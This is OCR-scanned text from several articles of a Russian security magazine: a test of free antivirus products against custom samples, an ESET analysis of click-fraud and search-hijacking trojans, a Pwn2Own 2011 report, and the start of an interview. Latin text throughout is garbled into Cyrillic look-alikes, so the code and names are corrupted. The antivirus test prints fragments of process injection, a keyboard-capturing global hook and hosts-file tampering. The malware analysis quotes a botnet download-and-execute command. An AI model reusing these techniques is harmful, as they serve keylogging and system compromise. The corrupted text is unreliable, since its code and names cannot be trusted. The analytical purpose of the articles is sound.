ІіЕхрІогегРгосеББ, 0, 0x3000, МЕМ_СОММІТ | МЕМ_КЕ5ЕКѴЕ, 

РАСЕ ЕХЕСІІТЕ КЕАОІдІКІТЕ ) ; 

пКеТигпСобе = ІлІгііеРгосеББМетогу (ІіЕхрІогегРгосеББ, 
рЕхрІогегМетогу, ТбгеабРипс, 0x1000 ,0); 
бКетоіеТІігеаб = Сгеа1:еКето1:еТІігеаб(ІіЕхр1огегРгосе55, 0, 0, 

( ІРТНКЕАО_5ТАКТ_КОІІТІІ\ІЕ ) 
рЕхрІогегМетогу, &Ехр1огегЮ, 0, 0); 

Здесь с помощью функций Ргосезз32Рігз1:/Ргосе5532І\ІехІ я ищу необ- 
ходимый мне процесс іехріоге.ехе. Далее, когда он найден, я получаю 
Ю процесса, хэндл процесса и выделяю в адресном пространстве 
последнего регион памяти с помощью ѴігІиаІАНосЕх. После этого я 
записываю в выделенную память код моего потока ТбгеабРипс: 

БТаТі ОІлІОРШ ТбгеабРипс (І_РѴОЮ ІрТбгеабРагатеіег) 

{ 

геТигп 0; 

> 
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СІатАѴ демонстрирует свои награды. Что же, пусть 
сверлит дырку для нашего, хакерского, ордена 





Аѵіга АпІіѴіг РегзопаІ - Ргее Апііѵігиз 



Завершающий этап — запуск удаленного потока — выполняется с 
помощью функции СгеаІеРетоІеТбгеасІ. И как справились с этим анти- 
вирусы? Да абсолютно аналогично: Аѵазі и Сотосіо обнаружили «угро- 
зу», а остальные — нет. Хотя антивирус АѴ6 и выдал предупреждение о 
неизвестной угрозе, но сделал он это только после того, как удаленный 
поток стартовал. Кроме того, Апіі-Ѵігиз Ргее Есііііоп выдавал предупре- 
ждения через раз, поэтому я поставил ему +/- за этот файл. 

Тест четвертый: глобальные хуки 

Дальше я решил проверить, как антивирусы обнаруживают установ- 
ку глобальных хуков. Глобальный хук — процедура, через которую 
система пропускает определенный тип событий, например, данные, 
поступающие от клавиатуры. Установка глобального хука — весьма 
популярная у зловредов техника, используется она для перехвата дан- 
ных, вводимых пользователем, поэтому весьма любопытно проверить, 
смогут ли испытуемые антивирусы помочь обычным юзерам. 

Фрагмент кода основного файла: 

НМСЮІІІ_Е Ь011 = ІоасИіЬгагуЫ( . сИІ" ) ; 

РѴОЮ рНоокРгос = (РѴ0Ю)0е1:РгосАсІсІге55(Іі011, "НоокРгос" ) ; 

ННООК ЫНоок = 5е1:ІлІіпсІоы5НоокЕх1лІ(ІлІН_КЕУВ0АК0^ 

(НООКРКОС) рНоокРгос, 6011, 0); 




Аѵазі знаменит своими экранами в реальном времени 



Чтобы перехватывающая функция обрабатывала все события 
в системе, она должна быть помещена в ОН в виде экспор- 
тируемой функции. Поэтому вначале я получаю базовый адрес 
вспомогательной библиотеки с помощью І_оасИ_іЬгагу, а затем 
адрес экспортируемой функции НоокРгос из последней библио- 
теки. Далее АРГшка ЗеіѴѴіпсІоѵѵзНоокЕх устанавливает хук на 
клавиатуру. Код экспортируемой функции в 0І_І_ вполне три- 
виален. Как на это отреагировали испытываемые антивирусы? 
Внедрение библиотеки обнаружил только Сотосіо. Даже Аѵазі;, 
который успешно отбивал «атаки» трех предыдущих поделок, 
сдал. О других антивирусах я вообще молчу — они также ничего 
не выдали. 

Тест пятый: модификация Нозіз 

Ну и напоследок я решил проверить, как же антивирусы реагируют на 
модификацию системного файла бозіз, который отвечает за привязку 
определенных доменных имен к ІР-адресам. Фрагмент кода, ответ- 
ственного за правку бозіз: 

НАШІ_Е бРіІе = Спеа1:еРі1е1лІ( 

І_"С: ХХыіпсІоызХХзуБ'ІетЗгХХсІгіѵегБХХеІсХХбоБІіБ" , 

6ЕМЕКІС_КЕА0 | С Е N Е КІ С 1л( ПІ Т Е 

РІІ_Е_5НАКЕ_КЕА0 | РІІ_Е_5НАКЕ_1лІКІТЕ, 

0, ОРЕІ\І_АІ_ІлІАѴ5, РІІЕ_АТТКІВиТЕ_ШКМАІ_, 0); 

НАШІ_Е бМарріп§ = Сгеа1:еРі1еМарріп§1лІ(ІіРі1е, 0, 

РАСЕ_КЕА01лІКІТЕ , 0, 0, 0); 

РѴОЮ рНозІБ = МарѴіемО-РРі1е(бМарріп§, 

РІІ_Е_МАР_АІ_І__АССЕ55, 0, 0, 0); 
тетсру(рНо5І:5, МаІыагеНозІ:, 1з1:г1епА(Ма1ыагеНо51:) ) ; 
тетсру( (с6аг*)рНоз1:5 + 1з1:г1епА(Ма1магеНо5І:) , 

ЕпсИп^ВуІез, зігеоі (ЕпсІіп§Ву1:е5) ) ; 

Код не должен вызывать вопросов — все просто и очевидно. Я решил 
использовать не связку РеабЕіІе/ѴѴгіІеЕіІе, а маппирование файлов с 
помощью МарѴіеѵѵОІРіІе, исключительно для удобства. С этим зада- 
нием справились опять же только продукты от Аѵазі и Сотосіо, что, в 
общем-то, было уже ожидаемо. 

Заключение 



Фрагмент кода 0І_І_: 

ЕХТЕКІ\І_С сІесІ5рес(сІ11ехрог1:) ОіліОІЮ НоокРгос( 

іпТ: сосіе, ІлІРАКАМ ыРагат, І.РАКАМ ІРагат) 

{ 

геіигті Са11№х1:НоокЕх(0, сосіе, ыРагат, ІРагат); 

} 



Бесплатные версии продуктов показали себя не с лучшей стороны — 
их проактивка не мониторит даже совершенно стандартную вирусную 
активность. Может быть, платные версии справились бы лучше? Как 
знать, как знать. С другой стороны, во всем можно найти положитель- 
ные стороны — помнишь нашу статью про тест халявных антивирусов 
и защиту от бгіѵе-Ьу угроз [ хакер.ги/рогі/бДІбІ/сІеІаиІІ.азр )? Вроде бы, 
в нем они неплохо себя показали... т 
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■ ■ Александр Матросов, Зепіог таіѵѵаге гезеагсЬег, Е5ЕТ 



рис. 1. Схема алгоритма работы подмены результатов поисковой выдачи 




5Е0 В ЧЕРНОЙ ШЛЯПЕ 



ВІаскНаІ ЗЕО с использованием вредоносных 
программ 

о В этой статье мы поговорим о том, каким образом с точки зрения 
«черных» методов 5Е0 могут быть использованы вредоносные 
программы - например, путем генерации трафика для 
заинтересованных ресурсов или скликивания контекстной рекламы. 



Понятно, что увеличение числа посетителей на сайте интернет- 
магазина или компании, занимающейся недвижимостью, вероят- 
нее всего положительно скажется на их доходах. Поэтому разра- 
ботка подобного типа вредоносных программ кибепреступниками 
— вполне себе обыденное дело, и появились такие программы уже 
давно. По большей части такую малварь можно разделить на два 
класса — это различного рода Абѵѵаге, которое распространяется 
вместе с популярными программами, или трояны, которые осущест- 



вляют более серьезную модификацию системы. Но, безусловно, 
бывают и исключения, которые мы также обсудим в этой статье. 

ѴѴіп32/РаІсНесІ.Р 

Давай для начала рассмотрим достаточно экзотический, но от этого 
не менее интересный способ подмены результатов поиска в попу- 
лярных поисковых сервисах, который был реализован в троянской 
программе ѴѴіп32/РаІсЬе<±Р (Е5ЕТ). В первый раз я столкнулся с 
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рис. 2. Интересные трояну интернет-сервисы 



этой вредоносной программой осенью 2008 года, и она привлекла 
меня тем, что используемый ей алгоритм подмены был хорошо про- 
думанным и более сложным для обнаружения, чем у «конкурентов». 
ѴѴіп32/Ра1сЬесІ.Р вносила всего лишь одно изменение в систему: она 
модифицировала системную библиотеку ѵѵз2_3 2. б II* которая отвеча- 
ет за реализацию сетевых функций прикладного уровня (например, 
таких как сокеты) в операционных системах М5 ѴѴіпсІоѵѵз. Полезная 
нагрузка представляла собой кусок ассемблерного кода, который 
дроппер вставляет в конец оригинальной ѵѵз2_32.сІІІ, модифицируя 
также точку входа, таблицу экспортов, релокации и склеивая все 
секции в одну для упрощения жизни при вышеописанных модифи- 
кациях. 

На рисунке 2 представлены интернет-сервисы, к которым этот троянец 
проявлял особенный интерес путем осуществления перехвата часто 
используемых для реализации сетевого взаимодействия системных 
функций, таких как: 

іпі ІлІ5А5епсІ( 

іп БОСКЕТ 5, 

іп І_РІлІ5АВІІР ІрВиТТегБ, 

іп ОІлКЖ) сІіл/ВиТТегСоипі, 

оиі І_РОІлІОКО ІрІМитЬегОТВуіеББепі, 

іп ОІлІОРШ сЫР1а§5, 

іп І_РІлІ5А0ѴЕКІ_АРРЕ0 ІрОѵегІарресІ , 

іп ІРМ5А0ѴЕКІАРРЕ0_С0МРІЕТІ0І\І_К01ІТІІ\ІЕ ІрСотрІеііопКоиііпе 

); 

іпі: ІлІ5АКесѵ( 

іп БОСКЕТ 5, 

іпоиі ЬРІАІБАВиР ІрВи-РТегБ, 

іп ОІлІОКО сЫВи-РТегСоипі, 

оиі: І_РОІлІОКО 1рІ\ІитЬегО-РВуіе5КесѵсІ, 

іпоиі І_РОІлІ(ЖО 1рР1а§5, 

іп І_РІлІ5АОѴЕКІ_АРРЕО ІрОѵегІарресІ, 

іп ІРМ5А0ѴЕКІАРРЕ0_С0МРІЕТІ0І\І_К01ІТІІ\ІЕ ІрСотрІеііопКоиііпе 

); 

іпі: 5епсІ( 

іп БОСКЕТ 5, 

іп сопбі сіпаг *Ьиі, 

іп іпі: Іеп, 




рис 3. Перехват функций ѴѴіпЗоск 

іп іпі: Яа§5 

); 

іпі: гесѵ( 

іп БОСКЕТ 5, 

оиі сііаг *ЬиТ, 

іп іпі Іеп, 

іп іпі Па§5 

); 

іпі 5е1есі( 

іп іпі ПІСІБ, 

іпоиі ТсІ_5еі *геасІ-РсІ5, 

іпоиі ТсІ_5еі *ыгііеісІ5, 

іпоиі ТсІ_5еі *ехсеріісІ5, 

іп сопбі Бігисі іітеѵаі *іітеоиі 

); 

Перехватывая и контролируя указанные функции ѴѴіпзоск на этом 
уровне, можно осуществлять подмену любых 6ЕТ/Р05Т запросов 
независимо от разработчика браузера или его версии. Да и заметить 
сходу такую подмену сможет далеко не каждый системный адми- 
нистратор, не говоря уже о большинстве пользователей. На уровне 
модифицированного кода, на примере функции ѴѴЭАРесѵО, это 
выглядит так (рис. 3). 

В общем виде схема алгоритма работы подмены результатов поиско- 
вой выдачи будет выглядеть следующим образом (рис. 1). А результат 
успешной работы этого алгоритма будет, например, таким (рис. 5). 
Конечно же, весь функционал не ограничивается только подменой 
результатов поиска. Есть интересные экземпляры троянских программ, 
которые осуществляют скликивание и накрутку контекстных объявле- 
ний. 

Сэмпл ТОІ.4 — ѴѴіп32/ОІтагік.АОѴ 

Вот, к примеру, не так давно нами была замечена интересная 
особенность в некоторых новых сэмплах руткита ТОІ_4 — ѴѴі п32/ 
ОІппагік.АОѴ, о котором я достаточно подробно написал в своей 
предыдущей статье в январе 201 1 года. Но, если кто не в курсе, 
данному руткиту удается удерживать звание самой технологич- 
ной массовой вредоносной программы на протяжении вот уже 
нескольких лет. 

Это первый полноценный руткитдля х64, которому удалось в 
обход проверки цифровой подписи и РаІсЬОиагб пробраться в 
ядро на 64-битных системах. Но давай вернемся к тому, из-за чего 
собственно пошел разговор об этом рутките. А дело в том, что 
после своей собственной успешной установки некоторые экзем- 
пляры этого руткита устанавливают в систему еще и троянцев из 
семейства ѴѴіп32/61ир1;еЬа (Е8ЕТ). Это наводит на мысли о том, 
что ресурсы данного ботнета начали сдавать в аренду. Также инте- 
ресен тот факт, что дальнейшего взаимодействия между ботами 
ѴѴіп32/ѲІирІеЬа и ТЭІ_4 нет. 

Итак, сразу после установки и идентификации бот ТОІ_4 получает из 
С&С команду: 

іа5к_ісІ = 2 1 10 1 | Ііххр://ыІіее1саг5 . ги/по.ехе 
Интерпретировать которую можно следующим образом: 

іазк_ісІ = [соттапсІ_ісІ] [епсгурііоп_кеу] [ІІКІ_] 

В нашем случае набор параметров совпадает с командой 
«ОоѵѵпІоабАпбЕхесиІе», поскольку ключ шифрования равен нулю, 
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рис. 4. Нездоровый интерес к тазіегііозі'у 
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рис. 5. Результат успешной работы алгоритма зловреда 
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рис. 6. Еще более нездоровый интерес к Бегуну 



а идентификатор команды равен двум, и затем следует количество 
попыток ее выполнения, равное десяти. После установки в систему 
ѴѴіп32/61ирІеЬа получает задание уже из своего С&С и начинает его 
выполнение (см. рис. 7). 

Чаще всего бот получает два типа заданий — скликивание контекст- 
ной рекламы из рекламной сети «Бегун» и рассылку спама. Давай 
поподробнее рассмотрим, что же делает этот бот. 

рис. 7. \Л/іп326Іир1еЬа получает команды из своего центра 




В первом случае происходит посещение большого количества сфор- 
мированных специальным образом веб-страниц, наполнение которых 
провоцирует появление определенного типа контекстных объявле- 
ний. Причем все веб-страницы, с которых происходит скликивание, 
расположены на серверах провайдера Мазіегбозі (рис. 4). Если 
посмотреть на статистику сетевых обращений скликивающего бота, то 
можно заметить большое количество обращений к серверам компа- 
нии «Бегун». Интерес со стороны ѴѴіп32/01ирІеЬа к другим сервисам 
контекстной рекламы замечен не был — возможно, это объясняется 
тем, что сам алгоритм скликивания контекстной рекламы реализован 
достаточно примитивно. А в крупных системах, таких как Яндекс. 
Директили Ѳоодіе АсІѴѴогсІз, реализованы серьезные механизмы 
защиты от подобного рода мошенничества, которые сильно портят 
жизнь желающим быстрой наживы за счет вышеописанных способов 
нечестного продвижения. 

Сам же ботнет ТБІ_4 так же, как и его предшественник предыдущей 
версии, активно монетизируется через «черные» методы про- 
движения веб-сайтов и подмену результатов поиска в популярных 
поисковых системах. Только он реализует гораздо более серьезные 
методы, используя способ скрытого запуска браузера Місгозоіі: 
Іпіегпеі Ехріогег через вызов АсііѵеХ- компонента ѴѴеЬВгоѵѵзег и эму- 
ляции работы пользователя (при посещении веб-страницы меняется 
положение курсора). Кроме того, в нем реализован обход прочих 
превентивных методов обнаружения ботов. Но поговорим мы об этом 
как-нибудь в другой раз. іні 
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СЦЕНА 



■ ■ Мария «МНтіІІ» Нефедова (ті^гішагеаі. хакер. ги) 




Рѵѵп20ѵѵп: 

СОРЕВНОВАНИЕ 
ДЛЯ ХАКЕРОВ 

Хакерский контест на конференции СапЗезѴѴезІ 

о Мы регулярно рассказываем тебе о самых заметных и интересных 
событиях мировой сцены. Мы представляли на твой суд отчет с 
ВІаскНаІ, писали о НІТВ, публиковали календари конференций, фору- 
мов и лан-пати на год. Однако один ивент оказался незаслуженно обде- 
лен вниманием. Сегодня мы восполним этот информационный пробел. 



О соревновании 

Начнем с того, что Рѵѵп20\л/п — это ежегодное 
соревнование хакеров и маститых специали- 
стов в сфере ИБ. Здесь ломают самые разные 
штуки, начиная от браузеров и заканчивая 
макбуками, а в качестве трофеев домой уносят 
не только денежные призы, но и те девай- 
сы, которые удалось взломать. Именно этот 
принцип и обыгран в названии ивента: «Рѵѵп» 
— это сленговое «поиметь», а «Оѵѵп» — запо- 
лучить в собственность :]. 

В этом году состоялся уже пятый по счету 
Р\л/п20\л/п — проходил он, как обычно, в рамках 
конференции СапБесѴѴезІ ( сапзесѵѵезі.сот ). 
Для тех, кто не следит за ІТ-мероприятиями, 
поясним: это довольно серьезное событие, 
ежегодно проводящееся весной в Канаде 
и отличное от обычных полунеформальных 
хакерских тусовок. СапБесѴѴезІ год от года 
посещают весьма серьезные личности, 
а кроме того, его поддерживают топовые 
ІТ-компании (Місгозо^, АбоЬе, ВІаскВеггу, 

Іпіеі и так далее). Конференция, само собой, 
от и до посвящена информационной безопас- 
ности. В качестве спикеров и ведущих тре- 
нингов (кстати, платных и довольно дорогих) 



на СапБесѴѴезІ в основном выступают крутые 
дядьки, занимающие высокие должности в 
крупных компаниях. К примеру, среди доклад- 
чиков можно найти имена таких профи, как 
Маркус Ранам или Чарли Миллер. Как уже 
было отмечено выше, хакерское состязание 
Рѵѵп20\л/п существует пять лет, в то время как 
сам СапБесѴѴезІ ведет свою историю с начала 
2000-х. Справедливости ради стоит сказать, 
что по-настоящему широкую известность и 
огласку Рѵѵп20\л/п получил лишь в прошлом 
году. 

Бессменным спонсором соревнования высту- 
пает небезызвестная на ИБ-рынке компания 
ТірріпдРоіпІ, некогда входившая в состав 
ЗСот, а ныне являющаяся частью Неѵѵіеи- 
РаскагсІ. Именно эти парни берут на себя не 
только львиную долю расходов, но и обяза- 
тельство сообщать производителям обо всех 
удавшихся на Рѵѵп20ѵѵп взломах. То есть, пока 
вендор не будет поставлен в известность о 
найденной в продукте дырке и способе, кото- 
рым ее эксплойтировали, широкая публика 
о баге и эксплойте никаких подробностей не 
узнает. В среднем такое вето налагается на 
полгода. В конце концов, речь идет о ѵѵбііе 



бабах, этичном хакинге, и ожидать чего-либо 
другого было бы даже странно. 

Кстати (если уж говорить о расходах и бюд- 
жете) размер призового фонда Р\л/п20ѵѵп, 
как правило, начинается от $1 00 000 (в про- 
шлом году, к примеру, общий призовой фонд 
составил $1 00 000, в этом году — $1 25 000), 
и в среднем удачный хак приносит его авто- 
ру $10 000 — 20 000. При этом ТірріпдРоіпІ 
отнюдь не остается внакладе. Дело в том, 
что крупные игроки рынка ИБ, скупающие 
уязвимости и эксплойты, имеют для покупки 
багов собственные специальные программы. 

У Тірріпд Роіпі; это проект 2его йау Іпібабѵе 
( гегосіаѵіпібаііѵе.сот ). также известны про- 
граммы Бпозо^ ргодгат ( зпозо^.Ыодзроб 
сот ) и Юеіюпзе Ѵиіпегабііііу Сопігібиіог 
Ргодгат. Р\л/п20ѵѵп стал очень хорошей рекла- 
мой для 201, о чем в интервью не раз говорили 
и сами представители компании. Привлекая 
внимание к проекту, ТірріпдРоіпІ удается запо- 
лучить больше уязвимостей, которые затем 
продаются по подписке другим компаниям 
за очень хорошие деньги. К тому же, любое 
хакерское соревнование — это еще и отлич- 
ный шанс найти талантливые кадры. Яркий 
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Чарли Миллер на СапЗесѴѴезі 2008 




Баннер приветствует посетителей Рѵѵп20\л/п 2011 



тому пример — Питер Вронгдейл. Ранее он был независимым иссле- 
дователем, а теперь получил работу в ТірріпдРоіпІ и в 201 1 году уже 
выступил на Рѵѵп20\л/п не в качестве участника, а в качестве судьи. 

Что ломают 

Так уж сложилось, что основное внимание на Р\д/п20\л/п уделяется 
взлому браузеров, различного сетевого софта и мобильных устройств. 
Имеются у конкурса и собственные звезды, а также своего рода завсег- 
датаи. Например, в разные годы на Р\л/п20\л/п засветились Джордж 
«ѲеоНоІ» Хотц, которому была посвящена большая публикация в 
прошлом номере, и Чарли Миллер — всемирно известный эксперт 
по информационной безопасности, неоднократно становившийся 
победителем Р\л/п20ѵѵп. Однако, кроме «показательных выступлений» 
маститых спецов случается и такое, что в конкурсе принимают участие 
команды известных секьюрити-фирм или вообще анонимы. Между 
прочим, сохранение инкогнито последних гарантирует сама компания 
ТірріпдРоіпІ. В 2011 году таких «мистеров Икс» было четверо. 

Итак, как же проходит само соревнование? В целом, конкурс можно 
описать довольно просто: собрались в одном месте хакеры и давай 
проверять, кто из них быстрее и лучше справится с взломом различных 
гаджетов и софта. Разумеется, собираются «взломщики» не просто так, 
а предварительно записавшись на Рѵѵп20\л/п (о том, как подать заявку 
на участие, расскажет сайт гірріпдроіпі.сот ). Последовательность 
выступления участников и команд определяется случайной жеребьев- 
кой. Каждой команде или участнику на взлом отводится всего 30 минут 
и, как показывает практика, это море времени — зачастую хак произ- 
водится в буквальном смысле за считанные секунды. Разумеется, так 
выходит потому, что все тщательно готовятся к соревнованию заранее. 
Ну а теперь пора перейти от общих фраз к подробностям. В этом году 
в программе мероприятия традиционно были заявлены «жертвы»- 
браузеры, представленные последними (на момент проведения кон- 
курса] релиз- кандидатам и, а именно МісгозоГС Іпіегпеі Ехріогег, Арріе 
5аба гі, Могіііа Рігебох и боодіе Сбготе. Кстати, Сбготе единственный 
браузер, который в 2009 и 2010 годах никак не могли сломать. 

Сейчас, наверное, у многих возник вопрос: «А как же Орега?». 
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Процитируем организаторов Р\л/п20\л/п: «При 
выборе браузеров мы руководствовались их 
долей на рынке. Баги Орега мы через 7В\ не 
принимаем». Словом, детище норвежских 
программеров пока остается за бортом. 

Все браузеры были установлены на 64-бит- 
ные 05 X или ѴѴіпсІоѵѵз 7, а производители 
потрудились перед самым соревнованием 
выпустить обновления, залатав как можно 
больше дыр. 

Финансовая награда за хак ІЕ, 5аба гі и Рігебох 
в этом году составляла $15 000, в то время как 
за взлом СЬготе компания Ѳоодіе учредила 
свой собственный приз. В первый день кон- 
курса поисковый гигант был готов заплатить 
за уязвимость, найденную в коде Ѳоодіе, $20 
000 и подарить хакеру ноутбук СР-48. Если 
же этот первый тур не принес бы плодов, то в 
последующие дни уже 7В\ предлагал $10 000 
за уязвимость в коде, написанном не Ѳоодіе, а 
сам Ѳоодіе давал за дырку в СЬготе $1 0 000. 
Плюс, как уже было замечено, участники 
уносят с собой и компьютер/гаджет, на кото- 
ром/который ломали. «Железная» часть 
состязания 201 1 года была представлена сле- 
дующими девайсами: 5опу Ѵаіо (ѴѴіпсІоѵѵз 7), 
Аііепѵѵаге ті 1х (ѴѴіпсІоѵѵз 7), Арріе МасВоок 
Аіг 13» (Мае 05 X 5поѵѵ БеорагсІ) и Ѳоодіе 
СР-48 (СЬготе05), который играл исключи- 
тельно роль приза, а не рабочей машины. 
Однако одними лаптопами дело обычно не 
ограничивается — в конкурсе участвуют также 
и мобильные устройства. В этом году хакеры 



проверили на прочность следующие девайсы: 
Ѳеіі Ѵепие Рго (ѴѴіпсІоѵѵз 7), іРЬопе 4 (Ю5), 
ВІаскЬеггу ТогсЬ 9800 (ВІаскЬеггу 6 05) и 
ІЧехиз 5 (АпбгоісІ). Приз за удачное эксплой- 
тирование дыр в перечисленных устройствах 
составлял $15 000. 

Как ломают 

Рѵѵп20ѵѵп — это, в первую очередь, конкурс. 
А значит, участники будут стараться обойти 
друг друга на поворотах и осуществить хак 
как можно быстрее и изящнее. Желающих 
попробовать свои силы с каждым годом 
становится все больше и, цитируя Аарона 
Портного, руководящего в ТірріпдРоіпІ 
отделом исследований в области безопас- 
ности: «Либо наш конкурс становится 
популярнее, либо все больше людей ста- 
новятся способны на взлом мобильных 
устройств». Совокупность этих факторов 
приводит к самым настоящим рекордам. 
Скажем, публике, следящей за развитием 
событий на Рѵѵп20ѵѵп, известие о том, что 
«5аба гі взломали за пять секунд» вовсе не 
покажется строчкой из «желтой» статьи. 
Такое здесь в порядке вещей, и, кстати, в 
этом году секьюрити-специалисты из фирмы 
Ѵиреп действительно вскрыли 5абагі за пять 
секунд. Арріе не спасло даже то, что перед 
самым конкурсом компания обновила свои 
продукты, выпустив 5аба гі 5.0.4 и І05 4.3. 
Чарли Миллер, которому в прошлые 
годы принадлежала пальма первенства 




Настоящий завсегдатай и звезда 
Рѵѵп20ѵѵп Чарли Миллер 



по «яблочным» хакам, сообщил у себя в 
Твиттере, что оба его эксплойта удачно пере- 
жили обновления и остались работоспособ- 
ны. Французы из Ѵиреп, которым удалось 
обставить Миллера в этом году, в свою оче- 
редь, признались, что им из-за обновления 
пришлось немного дорабатывать некоторые 
эксплойты, а некоторые и вовсе перестали 
работать, но им это все равно не помешало. 
Из-за упомянутого выше вето подробности 



Команда Ѵиреп ломает ВІаскВеггу ТогсН 
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Третий день Рѵ/п20ѵѵп 2011, в ходе 
которого ни одна команда так и не 
смогла показать класс 




Расписание Сап$есѴѴе$і 2007 



взлома пока толком не известны, но можем 
сказать, что для взлома специалистам Ѵиреп 
понадобилось лишь открыть в 5аба гі заранее 
подготовленную вредоносную веб-страницу. 

В течение пяти секунд на компьютере ока- 
зался запущен калькулятор, а на жестком 
диске лежал файл, указывающий на то, что 
песочница удачно пройдена. На создание 
эксплойта было затрачено три недели, 
работало над этим три человека, и в дело 
пошли новые, нигде еще не засвеченные 
уязвимости. 

Та же участь постигла и Іпіегпеі Ехріогег 8, 
работающий на 64-битной ѴѴіпсІоѵѵз 7 5Р1. 

Так же, как до этого парни из Ѵиреп, Стивен 
Фьювер из компании Нагтопу Зесигііу смог 
продемонстрировать калькулятор и файл 
на жестком диске. Кстати, в Ѵиреп еще до 
начала состязания сообщали, что для ІЕ у 
них припасена уязвимость в Ргоіесіесі тобе, 
позволяющая обойти браузерную песочницу. 
Увы, у Фьювера тоже были тузы в рукаве, 
а приз достается тому, кто первым сумеет 
осуществить взлом. Фьюверу повезло на 
жеребьевке — его попытка стала первой. И 
последней. Кстати, Фьювер ломал 32-раз- 
рядную версию ІЕ. 

А вот СЬготе обновился куда более удач- 
но. Самый устойчивый браузер, об который 
в 2009 и 2010 годах хакеры уже обломали 
зубы, в этом году вновь устоял. Специалисты, 
сделавшие заявку на взлом «Хрома», были 
вынуждены отступить, даже не попытавшись 
что-либо сделать. Очевидно, их эксплойт 
после обновления стал неработоспособен. 
Специальный приз Ѳоодіе снова не достался 
никому. Основными факторами, препятствую- 
щими взлому, называют изоляцию подсистем 
браузера и многоуровневую защиту, которые 
надежно «прикрывают» СЬготе от использо- 
вания дыр в Ыті и баѵа. 

Во второй день соревнований ломали уже 
мобильные устройства. Здесь тоже не обхо- 
дится без своего рода рекордов — к примеру, 
в 2010 году іРЬопе 305 был взломан всего за 
двадцать секунд командой Ральфа-Филиппа 
Вейнмана и Винченцо Иоццо. 



В этом году хакеры тоже не ударили в грязь 
лицом и сумели справиться с іРЬопе 4 и 
ВІаскВеггу Тогсб. «Яблочный» смартфон 
снова одолел Чарли Миллер, на этот раз 
работавший с напарником в лице коллеги 
Диона Блазакиса из Іпберепсіепі Зесигііу 
Еѵаіиаіогз. В Сети уже шутят, что Арріе пора 
подумать о найме Миллера на работу, ведь он 
из года в год «находит ключик» к продуктам 
компании. На этот раз эксплойт Миллера 
сработал только под Ю5 4.2.1 , так как в Ю5 4.3 
ему перекрыла кислород новая технология 
случайного распределения адресного про- 
странства А5І_Р. Тем не менее, хак Блазакису 
и Миллеру все равно засчитали: невзирая 
на А5І_Р, сама уязвимость закрыта не была, 
а значит $15 000 и іРЬопе 4 отошли исследо- 
вателям. 

С «Блэкберри» в этом году совладала коман- 
да, отличившаяся в 2010 году скоростным 
взломом іРЬопе. Ральф-Филипп Вейнман, 
Винченцо Иоццо и присоединившийся к ним 
Уиллем Пинкерс действовали через браузер 
ВІаскВеггу версии 6.0.0.246. Троице удалось 
благополучно спереть с аппарата ВІаскВеггу 
Тогсб 9800 контакт-лист и базу данных изо- 



бражений. Хотя платформа РІМ и не имеет 
А5І_Р, БЕР и так далее, ее взлом всегда 
осложняется полным отсутствием открытой 
документации и ограниченным количеством 
утилит для анализа. 

Других участников, увы, постигла неудача. 

В том числе и Джорджа Хотца, который в 
последнее время находится под пристальным 
вниманием СМИ и правоохранительных орга- 
нов в связи со взломом консоли РІауЗіабопЗ 
и судебного разбирательства с 5опу. Хотц 
делал заявку на взлом Оеіі Ѵепие — смарт- 
фон на базе ѴѴіпсІоѵѵз РЬопе 7, однако из-за 
судебных разбирательств принять участия в 
конкурсе не смог. 

Из всего рассказанного сам по себе напра- 
шивается вывод, который, кстати, подтверж- 
дают и официальные лица: конкурс активно 
растет, развивается и привлекает все больше 
участников и спонсоров. Соревнование этого 
года дало хорошие результаты, что позволяет 
надеяться, что и в будущем году Рѵѵп20ѵѵп 
продолжит расширяться и добавит в копил- 
ку секьюрити-компаний и производителей 
немало новых залатанных дырок. Мы, в свою 
очередь, обещаем держать тебя в курсе, т 
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■ ■ Денис «сОп Оііеза» Макрушин |соп<Ше5агадтаі1.сот, сіе^ес.ги) 



БЕЗОПАСНОСТЬ 

ГЛАЗАМИ 

ПОЗИТИВНЫХЛЮДЕИ 

Хроники Розіііѵе Тесііпоіодіез 

ѳ 1998 год. Выход на свет из подземелий. Идеи создания журнала для 
энтузиастов, интересующихся еще не успевшей тогда сформироваться 
в России индустрией информационной безопасности, обретают форму. 
В это же время пишутся строчки первого российского сетевого сканера 
безопасности ХЗрібег, дальнейшая разработка которого приведет 
к появлению титана на рынке ИБ - компании Розіііѵе Тесііпоіодіез. 



К началу третьего тысячелетия хакерское движение усиливается преи- 
мущественно в недрах андеграунда. Как грибы после дождя появляют- 
ся похожие друг на друга форумы, где ведутся оживленные дискуссии о 
хитрых схемах пополнения кэша за счет уязвимостей в еще не обуздан- 
ных технологиях, растет число преступных группировок, а в средствах 
массовой информации все чаще мелькают новости об инцидентах в 
ІТ-сфере. Однако в этой «черной» культуре выходят на свет «белые» 
ростки, которые впоследствии превратят ее в целую индустрию. Хакеры 
все чаще фигурируют в СМИ; создают программные продукты, так или 
иначе предназначенные для защиты информации; делятся своими 
знаниями и опытом с широкой аудиторией, не скрывая своих реальных 
имен и тем самым оправдывая статус специалиста, а не злоумышлен- 
ника. Те, кто осознал тогда необходимость в обеспечении информаци- 
онной безопасности конечного пользователя и корпоративной инфра- 
структуры, теперь уверенно держатся на ногах. 

Одним из таких специалистов оказался Дмитрий Максимов, который 
в 1998 году начал вести разработку программы с целью обеспечения 
безопасности сетей, которые ему приходилось обслуживать. Спустя 
четыре года сканер безопасности ХБрісІег становится «визитной кар- 
точкой» компании Розібѵе Тесбпоіодіез, созданной специально для 
развития этого проекта. Мы посмотрим на сегодняшнюю индустрию 
информационной безопасности с «позитивной» позиции, которую будут 
представлять специалисты компании Розібѵе Тесбпоіодіез: технический 



директор Сергей Гордейчик и эксперт по информационной безопасно- 
сти Дмитрий Евтеев. 

Интервью с РозЖѵе Тесііпоіодіез 

Денис Макрушин (журнал «Хакер») 

№ Какие инновации позволяют РозЖѵе Тесбпоіодіез удерживать свои 
позиции на рынке информационной безопасности? Система контроля 
защищенности и комплексного мониторинга МахРаІгоІ, широкий спектр 
оказываемых услуг или что-то еще? 

Сергей Гордейчик (компания «РозЖѵе ТесЬпоІоідез») 

[Г]: С моей предвзятой точки зрения, основа РозЖѵе Тесбпоіодіез — это 
экспертиза. Мы — экспертная компания, сделанная экспертами для 
экспертов. Среди нас ходит шуточка: «Даже у нашей уборщицы есть 
консалтинговая фирма РТ Сіеапіпд Бегѵісез Іпс». Это касается всех 
направлений деятельности компании. Даже МахРаІгоІ, если взгля- 
нуть на него с академической точки зрения, это типичная экспертная 
система. В связи с этим в РТ было сформировано специализированное 
подразделение, исследовательский центр РозЖѵе Резеагсб, в котором 
трудится более сорока экспертов. Ста команда аккумулирует знания 
